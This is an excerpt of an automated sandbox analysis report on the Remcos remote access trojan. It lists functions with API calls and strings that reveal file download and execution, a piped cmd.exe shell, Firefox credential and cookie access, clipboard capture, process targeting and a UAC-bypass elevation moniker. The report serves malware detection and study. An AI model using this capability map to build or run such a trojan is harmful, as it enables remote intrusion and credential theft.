                                                                                • Instruction Fuzzy Hash: 92D0123255C70C8EE620ABB4AD0F8A4775CC317616F0007BA6CB5836D3E6405B1DC2AB
                                                                                Function 004027A7 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • std::_Deallocate.LIBCONCRT ref: 00402E2B
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Deallocatestd::_
                                                                                • String ID:
                                                                                • API String ID: 1323251999-0
                                                                                • Opcode ID: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
                                                                                • Instruction ID: a1ed0c2070530d0d1545540182683da5b3cb4a6c90a46b83737b9b29f97d9faa
                                                                                • Opcode Fuzzy Hash: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
                                                                                • Instruction Fuzzy Hash: FFB092364442007ACA026640AC86F5EB762ABA4710F14C92ABA9A281E2D6B74268A647
                                                                                Function 00426D42 Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: recv
                                                                                • String ID:
                                                                                • API String ID: 1507349165-0
                                                                                • Opcode ID: f4db5bd4806bc66e377c48788e3214861744c877e7cd4eb35e6567da0e63c1ec
                                                                                • Instruction ID: c63eaffdb417a6470c671315a396a42075a312041b5b8b5670d44767818a4bbd
                                                                                • Opcode Fuzzy Hash: f4db5bd4806bc66e377c48788e3214861744c877e7cd4eb35e6567da0e63c1ec
                                                                                • Instruction Fuzzy Hash: 26B09279108202FFCA150B60CC0886ABEA6ABC8382B00882DB586411B0C736C851AB26
                                                                                Function 00426D59 Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: send
                                                                                • String ID:
                                                                                • API String ID: 2809346765-0
                                                                                • Opcode ID: b9ca0b0eaa02557cb4d56b342a6254bf92ad90fc72112118e0a601f448bbd0ca
                                                                                • Instruction ID: 21703143275c54c82102de5c78eddca0fb0a16d203a0de67c7bd570fb3111ac2
                                                                                • Opcode Fuzzy Hash: b9ca0b0eaa02557cb4d56b342a6254bf92ad90fc72112118e0a601f448bbd0ca
                                                                                • Instruction Fuzzy Hash: 87B09B75108301FFD6150760CC0486A7D6597C8341F00491C718741170C635C8515725
                                                                                Function 00411CDE Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CEE
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                • Opcode ID: 419aedcff02c784107df6911406269fb4724b8c0c47efc41c654e3b285a5c19f
                                                                                • Instruction ID: 079a7b638a28e99b338f4493b6ebfa8105bff269478f0661155a893ef6bf0f7e
                                                                                • Opcode Fuzzy Hash: 419aedcff02c784107df6911406269fb4724b8c0c47efc41c654e3b285a5c19f
                                                                                • Instruction Fuzzy Hash: 13B00872418382EBCF02DF90DD0492ABAB2BB88741F184C5CB2A14107187228428EB06

                                                                                Non-executed Functions

                                                                                Function 00407CD2 Relevance: 44.6, APIs: 10, Strings: 15, Instructions: 835filesleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetEvent.KERNEL32(?,?), ref: 00407CF4
                                                                                • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407DC2
                                                                                • DeleteFileW.KERNEL32(00000000), ref: 00407DE4
                                                                                  • Part of subcall function 0041C322: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,34,004752F0,00000001), ref: 0041C37D
                                                                                  • Part of subcall function 0041C322: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,34,004752F0,00000001), ref: 0041C3AD
                                                                                  • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,34,004752F0,00000001), ref: 0041C402
                                                                                  • Part of subcall function 0041C322: FindClose.KERNEL32(00000000,?,?,?,?,?,34,004752F0,00000001), ref: 0041C463
                                                                                  • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,34,004752F0,00000001), ref: 0041C46A
                                                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                  • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                                                  • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004081D2
                                                                                • GetLogicalDriveStringsA.KERNEL32 ref: 004082B3
                                                                                • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084FF
                                                                                • DeleteFileA.KERNEL32(?), ref: 0040868D
                                                                                  • Part of subcall function 00408847: __EH_prolog.LIBCMT ref: 0040884C
                                                                                  • Part of subcall function 00408847: FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                                                                  • Part of subcall function 00408847: __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                                                                  • Part of subcall function 00408847: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                                                                • Sleep.KERNEL32(000007D0), ref: 00408733
                                                                                • StrToIntA.SHLWAPI(00000000), ref: 00408775
                                                                                  • Part of subcall function 0041CA73: SystemParametersInfoW.USER32 ref: 0041CB68
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                                                                • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                                                                                • API String ID: 1067849700-181434739
                                                                                • Opcode ID: 5d05b9e5912cfa102500c45496f1206bd97a638459f7d4c87d0a1996e3cafa4a
                                                                                • Instruction ID: f533dcafa702064eae222fc9ff54aa9327b172b3479e3db69e1c842a3252ef64
                                                                                • Opcode Fuzzy Hash: 5d05b9e5912cfa102500c45496f1206bd97a638459f7d4c87d0a1996e3cafa4a
                                                                                • Instruction Fuzzy Hash: F04293716043016BC604FB76C9579AE77A9AF91348F80483FF542671E2EF7C9908879B
                                                                                Function 0040569A Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 278pipesleepfileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __Init_thread_footer.LIBCMT ref: 004056E6
                                                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                • __Init_thread_footer.LIBCMT ref: 00405723
                                                                                • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660CC,00000000), ref: 004057B6
                                                                                • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                                                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                                                                                • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                                                                • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
                                                                                • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                                                                  • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90), ref: 004059E4
                                                                                • Sleep.KERNEL32(00000064,00000062,004660B4), ref: 004059FE
                                                                                • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                                                                • CloseHandle.KERNEL32 ref: 00405A23
                                                                                • CloseHandle.KERNEL32 ref: 00405A2B
                                                                                • CloseHandle.KERNEL32 ref: 00405A3D
                                                                                • CloseHandle.KERNEL32 ref: 00405A45
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                                • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                                                                                • API String ID: 2994406822-18413064
                                                                                • Opcode ID: c696ecc239ecaea7341ccd32d29cc90c40bd7cc6680ffd47ae91dd2587c992d5
                                                                                • Instruction ID: feb7c3e087fbbfe745e3798ef664df189eb35a760580a6c3fca7c2e5343dee52
                                                                                • Opcode Fuzzy Hash: c696ecc239ecaea7341ccd32d29cc90c40bd7cc6680ffd47ae91dd2587c992d5
                                                                                • Instruction Fuzzy Hash: 1A91C271604604AFD711FB36ED42A6B369AEB84308F01443FF589A62E2DB7D9C448F6D
                                                                                Function 00412132 Relevance: 31.7, APIs: 7, Strings: 11, Instructions: 238threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetCurrentProcessId.KERNEL32 ref: 00412141
                                                                                  • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                                                  • Part of subcall function 004138B2: RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004), ref: 004138DB
                                                                                  • Part of subcall function 004138B2: RegCloseKey.ADVAPI32(004660B4), ref: 004138E6
                                                                                • OpenMutexA.KERNEL32 ref: 00412181
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00412190
                                                                                • CreateThread.KERNEL32(00000000,00000000,00412829,00000000,00000000,00000000), ref: 004121E6
                                                                                • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00412455
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                                                                • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$34
                                                                                • API String ID: 3018269243-2922096132
                                                                                • Opcode ID: 259918de9c6694897dbcd9ab4b329364c25cef91643e64702c63e99cee531876
                                                                                • Instruction ID: f1b014459f2de55ad39b9ce4e2eab06dd530905b6b6ad57ecd0cf2e75cce6712
                                                                                • Opcode Fuzzy Hash: 259918de9c6694897dbcd9ab4b329364c25cef91643e64702c63e99cee531876
                                                                                • Instruction Fuzzy Hash: B971A23160430167C614FB72CD579AE77A4AE94308F40097FF586A21E2FFBC9A49C69E
                                                                                Function 0040BB6B Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 146fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBEA
                                                                                • FindClose.KERNEL32(00000000), ref: 0040BC04
                                                                                • FindNextFileA.KERNEL32(00000000,?), ref: 0040BD27
                                                                                • FindClose.KERNEL32(00000000), ref: 0040BD4D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Find$CloseFile$FirstNext
                                                                                • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                                • API String ID: 1164774033-3681987949
                                                                                • Opcode ID: ddf3ae28b5732d4bdf30ea22351dc37fdb7451648e085e9b91ca2b4f61ea912e
                                                                                • Instruction ID: 8b0b2ff803da1d4b435a108118727fe7c74031c8ac088da8990f7d135a86af9b
                                                                                • Opcode Fuzzy Hash: ddf3ae28b5732d4bdf30ea22351dc37fdb7451648e085e9b91ca2b4f61ea912e
                                                                                • Instruction Fuzzy Hash: C7514F3190021A9ADB14FBB2DC56AEEB739AF10304F50057FF506721E2FF785A49CA99
                                                                                Function 004168FC Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 80clipboardmemoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • OpenClipboard.USER32 ref: 004168FD
                                                                                • EmptyClipboard.USER32 ref: 0041690B
                                                                                • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 0041692B
                                                                                • GlobalLock.KERNEL32 ref: 00416934
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0041696A
                                                                                • SetClipboardData.USER32 ref: 00416973
                                                                                • CloseClipboard.USER32 ref: 00416990
                                                                                • OpenClipboard.USER32 ref: 00416997
                                                                                • GetClipboardData.USER32 ref: 004169A7
                                                                                • GlobalLock.KERNEL32 ref: 004169B0
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                                                                • CloseClipboard.USER32 ref: 004169BF
                                                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                                                • String ID: !D@
                                                                                • API String ID: 3520204547-604454484
                                                                                • Opcode ID: bf5a65ac99ffe61d9797845c90f3a5bbf17482b58dee495671916681c2117e8d
                                                                                • Instruction ID: 548dc4d81477911aad8e8b192ef25fd2d65b79b2884d290c2f7190e4363fe536
                                                                                • Opcode Fuzzy Hash: bf5a65ac99ffe61d9797845c90f3a5bbf17482b58dee495671916681c2117e8d
                                                                                • Instruction Fuzzy Hash: 23215171204301EBD714BB71DC5DAAE7AA9AF88746F00043EF946961E2EF3C8C45866A
                                                                                Function 0040F4AF Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 210processCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,p54,?,00475338), ref: 0040F4C9
                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4F4
                                                                                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F510
                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F58F
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040F59E
                                                                                  • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                                                  • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040F6A9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                                                                • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$p54$34
                                                                                • API String ID: 3756808967-1057179976
                                                                                • Opcode ID: 4c1678c020118b3bcda45d43f08c867fc8f180d6921f39041d9cab00d7c74641
                                                                                • Instruction ID: 73d50abc618c2a3d6a57d9d5b79267519347fdb4c989691d2635b3abfd1995a7
                                                                                • Opcode Fuzzy Hash: 4c1678c020118b3bcda45d43f08c867fc8f180d6921f39041d9cab00d7c74641
                                                                                • Instruction Fuzzy Hash: B5712E705083419AC724FB21D8959AEB7E4AF90348F40483FF586631E3EF79994DCB9A
                                                                                Function 0040BD72 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 131fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDEA
                                                                                • FindClose.KERNEL32(00000000), ref: 0040BE04
                                                                                • FindNextFileA.KERNEL32(00000000,?), ref: 0040BEC4
                                                                                • FindClose.KERNEL32(00000000), ref: 0040BEEA
                                                                                • FindClose.KERNEL32(00000000), ref: 0040BF0B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Find$Close$File$FirstNext
                                                                                • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                • API String ID: 3527384056-432212279
                                                                                • Opcode ID: efd911169634aa6eb296d91244de5f42230bb67941264acd6522b2be9cf9de9e
                                                                                • Instruction ID: 490896facf616f27299b965c2ba25c256be2621490ca3b25f990f1d956524bcc
                                                                                • Opcode Fuzzy Hash: efd911169634aa6eb296d91244de5f42230bb67941264acd6522b2be9cf9de9e
                                                                                • Instruction Fuzzy Hash: E0417F3190021AAACB04F7B2DC5A9EE7769AF11704F50057FF506B21E2EF385A458A9D
                                                                                Function 0041330D Relevance: 18.2, APIs: 12, Instructions: 153fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413452
                                                                                • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413460
                                                                                • GetFileSize.KERNEL32(?,00000000), ref: 0041346D
                                                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 0041348D
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0041349A
                                                                                • CloseHandle.KERNEL32(?), ref: 004134A0
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                                                                • String ID:
                                                                                • API String ID: 297527592-0
                                                                                • Opcode ID: f8cfc853885fc8b29f950af92ed283b35790545d66a1b0f015cadf1906342396
                                                                                • Instruction ID: 84c8eec30da1abd4ec43dfc3561b6153623c17c5959ee0fa3a13cc5c00e14cc2
                                                                                • Opcode Fuzzy Hash: f8cfc853885fc8b29f950af92ed283b35790545d66a1b0f015cadf1906342396
                                                                                • Instruction Fuzzy Hash: F041F331104301BBD7119F25EC49F6B3BACEFC9769F10052EF655D21A2DB38DA40866E
                                                                                Function 00419662 Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 206COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 0$1$2$3$4$5$6$7$VG
                                                                                • API String ID: 0-1861860590
                                                                                • Opcode ID: 2b7f1c5f9e74514b744c6683ac33cf56b6b25cbe789a3e3722b220038b1ce3bf
                                                                                • Instruction ID: 7133b754bba813e7b371628f59950815dc208a5c28e1558ec9b3f3725e93ffbd
                                                                                • Opcode Fuzzy Hash: 2b7f1c5f9e74514b744c6683ac33cf56b6b25cbe789a3e3722b220038b1ce3bf
                                                                                • Instruction Fuzzy Hash: 9171E2709183019FD704EF21D862BAB7B94DF85710F00492FF5A26B2D1DE78AB49CB96
                                                                                Function 0041C322 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 106fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,34,004752F0,00000001), ref: 0041C37D
                                                                                • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,34,004752F0,00000001), ref: 0041C3AD
                                                                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,34,004752F0,00000001), ref: 0041C41F
                                                                                • DeleteFileW.KERNEL32(?,?,?,?,?,?,34,004752F0,00000001), ref: 0041C42C
                                                                                  • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,34,004752F0,00000001), ref: 0041C402
                                                                                • GetLastError.KERNEL32(?,?,?,?,?,34,004752F0,00000001), ref: 0041C44D
                                                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,34,004752F0,00000001), ref: 0041C463
                                                                                • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,34,004752F0,00000001), ref: 0041C46A
                                                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,34,004752F0,00000001), ref: 0041C473
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                • String ID: 34
                                                                                • API String ID: 2341273852-837682457
                                                                                • Opcode ID: 74fc921fbbcb6c35e60b9a8f4f047a03f237c0767a03969ab094381de9c75e57
                                                                                • Instruction ID: 53b23dfad01ba0d5beec27b7c27070a1caf437d6ccbc5233b8522822963bc02e
                                                                                • Opcode Fuzzy Hash: 74fc921fbbcb6c35e60b9a8f4f047a03f237c0767a03969ab094381de9c75e57
                                                                                • Instruction Fuzzy Hash: 4A31807284431CAADB24E761DC89EEB736CAF09305F0405FBF559D2051EB3DDAC98A58
                                                                                Function 00407538 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 56COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _wcslen.LIBCMT ref: 0040755C
                                                                                • CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Object_wcslen
                                                                                • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                                • API String ID: 240030777-3166923314
                                                                                • Opcode ID: 117ce5ffae064854f49a167cf2fa86c02e7857af1ac0d1358aae668e1cde24ce
                                                                                • Instruction ID: 28daeeabb8f9d0779e909056d36d27ae9c6096be3406941992b1a3e854751cf1
                                                                                • Opcode Fuzzy Hash: 117ce5ffae064854f49a167cf2fa86c02e7857af1ac0d1358aae668e1cde24ce
                                                                                • Instruction Fuzzy Hash: 88113771D04214B6D710EA959845BDEB77C9B08714F15006FF904B2281EB7CAE448A6F
